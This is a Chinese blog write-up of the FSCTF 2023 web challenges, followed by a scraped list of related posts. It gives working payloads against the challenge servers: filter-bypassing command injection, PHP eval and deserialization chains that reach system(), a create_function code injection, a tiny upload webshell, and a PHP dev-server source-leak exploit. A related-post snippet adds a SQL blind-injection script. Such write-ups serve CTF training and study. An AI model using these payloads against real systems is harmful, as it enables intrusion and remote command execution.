FSCTF 2023-WEB部分wp

已于 2023-10-29 17:07:11 修改
阅读量1.2k 收藏 5
点赞数 2
文章标签: web安全 php
于 2023-10-28 14:22:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74606212/article/details/134090100
版权
文章详细介绍了webshell的概念,展示了如何通过passthru和eval函数执行命令,以及多个PHP代码示例,包括ez_php和绕过过滤的方法。讨论了文件泄露漏洞的利用和payload构建技巧,展示了利用BM头和反引号读取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

源码!启动!  

webshell是啥捏

细狗2.0

Hello,you

EZ_eval

ez_php1

巴巴托斯! 

ez_php2

寻找蛛丝马迹

CanCanNeed

签到plus

是兄弟,就来传你の🐎! 

源码!启动!  

这里打开开发人员工具,查看源代码

webshell是啥捏

前面表情包解释为passthru 

passthru — 执行外部程序并且显示原始输出

说明

passthru(string $command, int &$result_code = null): ?false

exec() 函数类似, passthru() 函数 也是用来执行外部命令(command)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec()system() 函数。 常用来执行诸如 pbmplus 之类的可以直接输出图像流的命令。 通过设置 Content-type 为 image/gif, 然后调用 pbmplus 程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。

 这里就可以直接ls查看了

细狗2.0

 过滤了空格

127.0.0.1;ls${IFS}$9/

127.0.0.1;ca\t${IFS}$9/f*

Hello,you

127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

EZ_eval

 源代码:

<?php
    if(isset($_GET['word'])){
    $word = $_GET['word'];
    if (preg_match("/cat|tac|tail|more|head|nl|flag|less| /", $word)){
       die("nonono.");
    }
    $word = str_replace("?", "", $word);
    eval("?>". $word);
}else{
    highlight_file(__FILE__);
}

这里过滤了 cat、tac、tail、more、head、nl、flag、less 和空格,并且删除?

在 eval 中加入了 php 闭合符就说明前面的 eval 被闭合已经不能用了

这道题既然过滤了问号那么就不能使用<?php ?>、<?= ?>和<? ?>

那么就还剩一个 <script language='php'> </script>

其中关于读取命令可以使用 ta\c 或者 ta""c 来绕过过滤 空格用%09 flag 用通配符

最终 payload 如下

?word=<script%09language='php'>system('ta\c%09/f*');</script>

ez_php1

<?php
highlight_file(__FILE__);
error_reporting(0);
include "globals.php";
$a = $_GET['b'];
$b = $_GET['a'];
if($a!=$b&&md5($a)==md5($b))
{
    echo "!!!";
    $c = $_POST['FL_AG'];
    if(isset($c))
    {
        if (preg_match('/^.*(flag).*$/', $ja)) {
            echo 'You are bad guy!!!';
        }
            else {
                echo "Congratulation!!";
                echo $hint1;
            }
    }
    else {
        echo "Please input my love FL_AG";
    }
} else{
    die("game over!");
}
?>

访问L0vey0U.php

 访问P0int.php

源代码:

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
@unserialize($_POST['data']);

?>

这里直接使用引用输出a即可

payload:

<?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{
    public $a;
    public $b;

    public function __wakeup()
    {
        $this->a = file_get_contents("php://filter/read=convert.base64-encode/resource=g0t_f1ag.php");
    }
    public function __destruct()
    {
        echo $this->b;
    }
}
$a=new Clazz();
$a->b=&$a->a;
echo serialize($a);


?> 
data=O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}

巴巴托斯! 

这里提示了FSCTF Brower

修改User-Agent

 Referer:127.0.0.1

直接伪协议

 

ez_php2

源代码:

 <?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
    public function __destruct()
    {
        echo "All matters have concluded";
        die($this->ending);
    }
    public function __call($name, $arg)
    {
        foreach ($arg as $key =>$value)
        {

            if($arg[0]['POC']=="1111")
            {
                echo "1";
                $this->cl->var1 = "system";
            }
        }
    }
}


class Poc{
    public $payload;

    public $fun;

    public function __set($name, $value)
    {
        $this->payload = $name;
        $this->fun = $value;
    }

    function getflag($paylaod)
    {
        echo "Have you genuinely accomplished what you set out to do?";
        file_get_contents($paylaod);
    }
}

class Er{
    public $symbol;
    public $Flag;

    public function __construct()
    {
        $this->symbol = True;
    }

    public function __set($name, $value)
    {
        $value($this->Flag);
    }


}

class Ha{
    public $start;
    public $start1;
    public $start2;
    public function __construct()
    {
        echo $this->start1."__construct"."</br>";
    }

    public function __destruct()
    {
        if($this->start2==="11111") {
            $this->start1->Love($this->start);
            echo "You are Good!";
        }
    }
}


if(isset($_GET['Ha_rde_r']))
{
    unserialize($_GET['Ha_rde_r']);
} else{
    die("You are Silly goose!");
}
?>

payload:

<?php
highlight_file(__file__);
Class Rd{
    public $ending;
    public $cl;

    public $poc;
}


class Poc{
    public $payload;

    public $fun;
}

class Er{
    public $symbol;
    public $Flag='ls /';

}

class Ha{
    public $start;
    public $start1;
    public $start2="11111";
}

$a=new Ha();
$a->start1=new Rd();
$a->start=['POC'=>'1111'];
$a->start1->cl=new Er();
echo serialize($a);
?>
?Ha_rde_r=O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:4:"1111";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";N;s:4:"Flag";s:4:"ls /";}s:3:"poc";N;}s:6:"start2";s:5:"11111";}

把Flag的值改为cat  /flag

?Ha_rde_r=O:2:"Ha":3:{s:5:"start";a:1:{s:3:"POC";s:4:"1111";}s:6:"start1";O:2:"Rd":3:{s:6:"ending";N;s:2:"cl";O:2:"Er":2:{s:6:"symbol";N;s:4:"Flag";s:9:"cat /flag";}s:3:"poc";N;}s:6:"start2";s:5:"11111";}

 

寻找蛛丝马迹

 

这里用火狐修复文字编码即可 

 和苹果有点关系联想到.DS_store

 

 

payload:

FSCTF{Tell_y0U_noT_To_poInT_oUt_tH@t_y000u_Don't_believe_it!}

CanCanNeed

源代码:

<?php
class Noteasy{
    protected $param1;
    protected $param2;
    
    function __destruct(){
        $a=$this->param1;
        $b=$this->param2;
        if(preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) { 
            die('this param is error!'); 
        } else { 
            $a('', $b); 
        }
    }
    
}
if (!isset($_GET['file'])){    
    show_source('index.php');
    echo "Hi!Welcome to FSCTF2023!";
  }
  else{ 
    $file=base64_decode($_GET['file']); 
    unserialize($file); }
?>

分析源码,对传入的 file 参数 base64 解码后反序列化,__destruct 函数中出现了 $a(‘’, $b); ,且 $a 和 $b 可通过 $param1 和 $param2 进行控制。
再观察正则表达式,发现没有过滤 system 和中括号,所以可以使用 system 执行 shell 命令,获取 flag。
所以将 $param1 设置为 create_function ,$param2 设置为 system($_GET[1])

payload:

<?php

class Noteasy
{
    protected $param1 = "create_function";
    protected $param2 = "};system(\$_POST[1]);//";

    function __destruct()
    {
        $a = $this->param1;
        $b = $this->param2;
        if (preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\*|\||\<|\"|\'|\=|\?|sou|\.|log|scan|chr|local|sess|b2|id|show|cont|high|reverse|flip|rand|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|y2f/i', $this->param2)) {
            die('this param is error!');
        } else {
            $a('', $b);
        }
    }
}

$n = new Noteasy();
echo(base64_encode(serialize($n)));
?file=Tzo3OiJOb3RlYXN5IjoyOntzOjk6IgAqAHBhcmFtMSI7czoxNToiY3JlYXRlX2Z1bmN0aW9uIjtzOjk6IgAqAHBhcmFtMiI7czoyMjoifTtzeXN0ZW0oJF9QT1NUWzFdKTsvLyI7fQ==

 POST传参

1=ls /
1=cat /f*

签到plus

打比赛时有提示扫一下

那我们就扫一下下

 中国人不骗中国人

访问一下

这个flag是假的,我收回上面说的话

看了一下提示,发现是

php7.4.21的文件泄露

PHP<=7.4.21 Development Server源码泄露漏洞_这周末在做梦的博客-优快云博客

抓包一下修改看看

copy to file

HTTP/0.9 200 OK
Host: node4.anna.nssctf.cn:28201
Date: Sun, 29 Oct 2023 08:53:09 GMT
Connection: close
Content-Length: 443

<?php
phpinfo();
$😀="a";
$😁="b";
$😂="c";
$🤣="d";
$😃="e";
$😄="f";
$😅="g";
$😆="h";
$😉="i";
$😊="j";
$😋="k";
$😎="l";
$😍="m";
$😘="n";
$😗="o";
$😙="p";
$😚="q";
$🙂="r";
$🤗="s";
$🤩="t";
$🤔="u";
$🤨="v";
$😐="w";
$😑="x";
$😶="y";
$🙄="z";

$😭 = $😙. $😀. $🤗. $🤗. $🤩. $😆. $🙂. $🤔;

if (isset($_GET['👽🦐'])) {
    eval($😭($_GET['👽🦐']));
};

?>

payload:

?👽🦐=ls /

?👽🦐=cat /f*

是兄弟,就来传你の🐎! 

先传几个试试,发现pht没有被过滤 

 但又限制了长度

 看别的师傅的wp,新的思路

利用BM头和php中的反引号直接读取flag。

BM<?=`cat /*`;

成功 

 

orzw
关注
FSCTF 2024——Web方向WP(1)
2401_84240129的博客
06-24 962
图片文件头:bmp文件 BM;gif文件 GIFphp文件后缀黑名单绕过:pht, phpt, phtml, php3,php4,php5,php6超短webshell ,读取根目录下的所有文件。
NSSCTF刷题篇web部分
weixin_74427106的博客
10-25 1461
这个源码泄露,可以记录一下,涉及的知识点比较多打开环境查看源码,第一段flag乱码,恢复一下剩下的就只说方法第三段flag就在这里,也是乱码恢复扫出来的目录就是第四段和第六段flag第五段在第四段有提示说和苹果有关系发现第四段flag通过搜索发现苹果和DS_store有关系访问/.DS_store得到第五段flag,和起来就是完全的flag。
WPFSCTF 2023 WEB
m0_63138919的博客
10-24 1553
本文为FSCTF 2023 web题解 供大家学习 有哪里不懂的或者有问题可以指出哦
[FSCTF 2023]ez_php2
2301_80243833的博客
08-22 470
这段代码主要定义了四个类(Rd、Poc、Er、Ha),并通过检查 $_GET 参数来决定是否进行反序列化操作。如果存在特定的 $_GET 参数,则尝试反序列化其值,否则输出 “You are Silly goose!开始找链子,入口在Ha里面。使得其触发__call方法,然后给start赋值[‘POC’=>‘1111’]然后value就成为了system,修改$Flag就可以修改执行的命令了。进入if语句,然后通过其中的var1触发__set方法。首先我们审计这段代码。
[FSCTF 2023]signin
YYueHua5的博客
03-10 168
有壳,脱一下,之后丢IDA里加密逻辑简单。
2023FSCTF--writrup -- by Crypto0
qq_69956003的博客
10-24 938
FSCTF2023
[FSCTF 2023]ez_php2 WP
SmillPig的博客
12-17 463
传参请求,拿到flag。
[FSCTF 2023]ez_php1已解决
XXokok的博客
10-24 909
[FSCTF 2023]ez_php1已解决
web刷题记录(7)
2301_81841047的博客
06-25 1125
后面的判断不妨可以自己测试一下,带有e的科学计数法形式的字符串,很多都可以通过这个判断,但是php的环境必须为7.0以下,否则字符串会和数字解析为相同的正确的结果。Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。本来我的思路是看看有没有就是那种存储型或者反射型的xxs,或者某个位置是否存在sql注入,或者说有没有文件上传的点,但是经过测试发现,很多页面都是静态的,直接就没有后端去处理那些数据,直接就跳转回一开始的页面,然后在,看了其他大佬的wp后,才知道这里的注入点在。
CTF——Web——PHP序列化和反序列化
小锤队长的博客
08-09 5922
PHP 序列化和反序列化: 1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程; 反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。 这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。 常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode 在进行类的序列化...
[FSCTF 2023]是兄弟,就来传你の!已解决
XXokok的博客
10-29 708
文件头绕过,文件内容类型绕过,
FSCTF 2023——Web方向WP
ASD830的博客
03-22 1402
图片文件头:bmp文件 BM;gif文件 GIFphp文件后缀黑名单绕过:pht, phpt, phtml, php3,php4,php5,php6超短webshell ,读取根目录下的所有文件=`nl /*`;、
web刷题总结5(nssctf)
Z052308的博客
05-05 1021
伪协议(传入相匹配的字符串和查看文件内容),文件包含,反序列化(to_string函数将类当作字符串从而echo执行命令),使用一些常见playload.show columns from Flag;
FSCTF 2023部分题目复盘(思路简易版)
sjcjfkdj的博客
11-08 606
部分题目wp参照某些大佬的,我只是从自己的角度略微总结了一下方法,只提供思路,具体自己复现或者参照其他大佬的wp我只是啥也不会的菜狗,别骂了别骂了。
[FSCTF 2023]webshell是啥捏
2301_80243833的博客
08-08 277
GET[‘外星人’]) 它会先执行这个函数,并将 $_GET[‘外星人’] 作为参数传递给这个函数,然后将函数的返回值作为要执行的 PHP 代码传递给 eval()。isset($_GET[‘外星人’]) 用于检查通过 URL 传递的名为 外星人 的 GET 参数是否被设置。php中变量与变量之间用点号连接表示拼接,题目拼接结果为passthru。eval() 函数会将传入的字符串当作 PHP 代码来执行。
[FSCTF 2023]寻找蛛丝马迹
2301_81462177的博客
08-20 334
访问一下styles.css,看到顶部有一串乱码(应该是flag一部分)我们用火狐的修复文字编码工具。.DS_Store是Mac OS X操作系统中由苹果公司创建的一种隐藏文件‌。然后再访问script.js,依旧是乱码,同样的方法得到flag第三段。它提示和苹果有点关系,应该是.DS_store。查看一下页面源码吧,发现第一段flag。第四段提示:我不想让谷歌搜到我的网站。点一下,看到只有页面背景颜色变化。用dirsearch扫一下看看。
[FSCTF 2023]加速加速已解决,一口气拿了9家公司的offer
m0_61549781的博客
04-06 753
具体操作如下:抓取上传文件的数据包和访问a.php文件的数据包,发送到Intruder模块​‍这两个数据包的payload都设置为如下这样:​然后就可以开始发包了。直到访问的那个数据包有正常响应的200状态码即是后门代码创建成功的标志了。如下图:​有正常响应的状态码了,那说明a.php被响应了不是404了嘛。那说明我们的1.php也被创建出来了嘛。如下图:没有报错能正常访问。那直接用哥斯拉getshell​​在根下拿到flag​​。
FSCTF2023 wp
HvAng10的博客
11-30 1382
看上去很复杂,根据c的位数以及flag的位数,e=3,小明文攻击,我们直接对c开3次方即可,一开始还真没看出来,傻傻的在想。这里考察到了兔子流密码的认识,它类似于base64编码的组成,可能以=结尾,最大的特征为,以U2FsdGVkX1开头!这里考察到了兔子流密码的认识,它类似于base64编码的组成,可能以=结尾,最大的特征为,以U2FsdGVkX1开头!>闭合,此时我们需输入<?emmm,没时间打,赛后自己做了一部分,跟wp复现了一部分。埃塞克,即ASCII,此处的ROT,我们试出是ROT47。
[FSCTF 2023]ez_php1
2301_80243833的博客
08-20 359
这段代码通过接收两个 GET 参数和一个 POST 参数来进行一系列的逻辑判断和输出。主要目的是在满足特定条件下输出不同的提示信息,可能涉及到一个简单的挑战或游戏。得到新的提示:P0int.php,我们直接访问/P0int.php
BaseCTF-Web-Week4-WP
最新发布
03-21
<think>好的,我需要处理用户关于BaseCTF Web Week4解题思路的请求。首先,用户提到了BaseCTF高校联合新生赛Week1和一篇关于UPX脱壳的博客,但实际需要的是Week4的Web题解。这可能存在混淆,我需要先确认是否存在Week4的公开资料。 检查现有资料,发现用户提供的引用是Week1和逆向工程的博客,与Web Week4无关。因此,我需要告知用户当前没有Week4的公开Writeup,并建议他们检查官方渠道或社区论坛。同时,提供通用的CTF Web解题思路会更有帮助,比如常见漏洞类型和解题步骤。 接下来,生成相关问题,需涵盖准备方法、常见漏洞类型、工具推荐、练习平台和团队协作等方面。确保问题能引导用户进一步探索,并覆盖可能的解题方向。 最后,保持回答结构清晰,分点说明,避免使用Markdown,用自然的中文口语化表达,同时遵循系统级指令中的格式要求,比如数学表达式和引用标识。确保回答真实可靠,不虚构信息,并提示用户关注官方信息。</think>关于BaseCTF Web Week4的解题思路,目前公开渠道尚未找到完整的官方Writeup。不过根据CTF Web题目的常规解题路径,可以提供以下通用建议: 1. **环境审计** - 首先检查网页源代码中的注释和隐藏字段,常包含提示信息如$baseURL = "http://week4.basectf.com/api" - 使用开发者工具分析网络请求,注意观察Cookie设置和JWT令牌的格式 2. **漏洞探测** - SQL注入点测试:尝试在参数后添加$' OR 1=1--进行基础探测 - 文件包含漏洞检测:测试参数如?file=../../etc/passwd - 模板注入验证:通过{{7*7}}测试是否返回49 3. **工具辅助** ```python # 示例SQL盲注脚本 import requests url = "http://target.com/search" for i in range(1,20): payload = f"1' AND (SELECT ASCII(SUBSTRING(database(),{i},1)))>100--" r = requests.get(url, params={"q":payload}) if "result found" in r.text: print(f"Position {i} is over 100") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值